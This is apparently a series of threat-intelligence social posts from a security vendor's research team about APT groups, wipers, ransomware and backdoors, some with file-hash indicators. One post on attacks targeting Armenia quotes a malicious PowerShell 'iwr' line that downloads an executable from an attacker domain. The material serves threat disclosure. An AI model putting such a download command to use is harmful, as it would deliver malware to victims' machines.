Why did attackers using tools associated with Chinese
#espionage
groups compromise a significant number of telcos in one country? Was it information gathering? Eavesdropping? Developing a disruptive capability? Or something else?
Breaking news on our SolarWinds investigation. We've found a previously undocumented piece of malware called Raindrop which was used by the attackers against some targets.
#SolarWinds
#Raindrop
#Sunburst
Update on
#wiper
attacks against
#ukraine
. In some attacks ransomware was also deployed against affected organizations at the same time as the wiper, likely as a decoy or distraction. IOC: 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382
Interesting detail from our analysis of the decoy ransomware used in
#ukraine
#wiper
attacks. Strings made mocking references to U.S. president Joe Biden.
Our Threat Hunter Team has encountered a new variant of
#SiestaGraph
, malware that interacts with Microsoft’s Graph API for command and control via Outlook and OneDrive. File hash: fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb (1/2)
THREAD: Latest on
#WhisperGate
wiper attacks. Thanks to cooperation with the community, we can confirm related samples were being built by actors and possibly deployed to unknown victims as early as October 2021. Other unconfirmed samples may date even earlier. [1/4}
Our Threat Hunter Team has found some evidence that attackers linked to Black Basta may have exploited CVE-2024-26169 as a zero-day prior to patching
#ZeroDay
#Ransomware
#BlackBasta
Our Threat Hunter team has found evidence of updated tooling by the Clubhorn APT group (aka
#SideCopy
). Recent attack involved modified version of
#NightFury
backdoor. (1/5)
Our Threat Hunter Team has discovered a few more IOCs relating to publicly reported attacks against airport and security targets in Armenia. (Documented here: and here ) (1 of 5)
APT attacks target Armenia. Attackers forged documents from the National Security Service of the Republic of Armenia,There is vba macro code
powershell iwr
https://karabakhtelekom[.com/api/ekeng-mta.exe
-UsebasicParsing -Outfile C:\users\Public\Downloads\ekeng-mta.exe
Read our blog to find out how advanced malware
#Daxin
attempts to evade detection by using communication techniques that can blend in unseen with normal network traffic on a victim network. Learn more:
#infosec
REVEALED: Buckeye espionage outfit was using Equation Group tools at least a year prior to the Shadow Brokers leak. Read more:
#apt3
#equation
#shadowbrokers
.
@Symantec
has identified the
#Orangeworm
attack group, which uses the
#Kwampirs
malware to target large healthcare-related firms in the U.S., Europe, and Asia
UPDATE on our
#WastedLocker
investigation. Dozens of US newspaper websites owned by the same parent company were compromised by attackers in order to infect potential targets. Symantec has notified the company and it has now removed the malicious code.
NEW: Symantec finds evidence
#Waterbug
attackers may have hijacked a separate espionage group’s infrastructure during attack on target in Middle East.
#Turla
#Crambus
#Oilrig
#NEW
-
#Graphican
-
#Flea
(
#APT15
) Uses New Tool in Attacks Targeting Foreign Ministries - backdoor leverages Microsoft Graph API for C&C communication.
Think everyone who works in
#infosec
has been hacking since they were a kid? Not necessarily: Working in Cyber Security: “I didn’t have any interest in computers when I was in school”
#careeradvice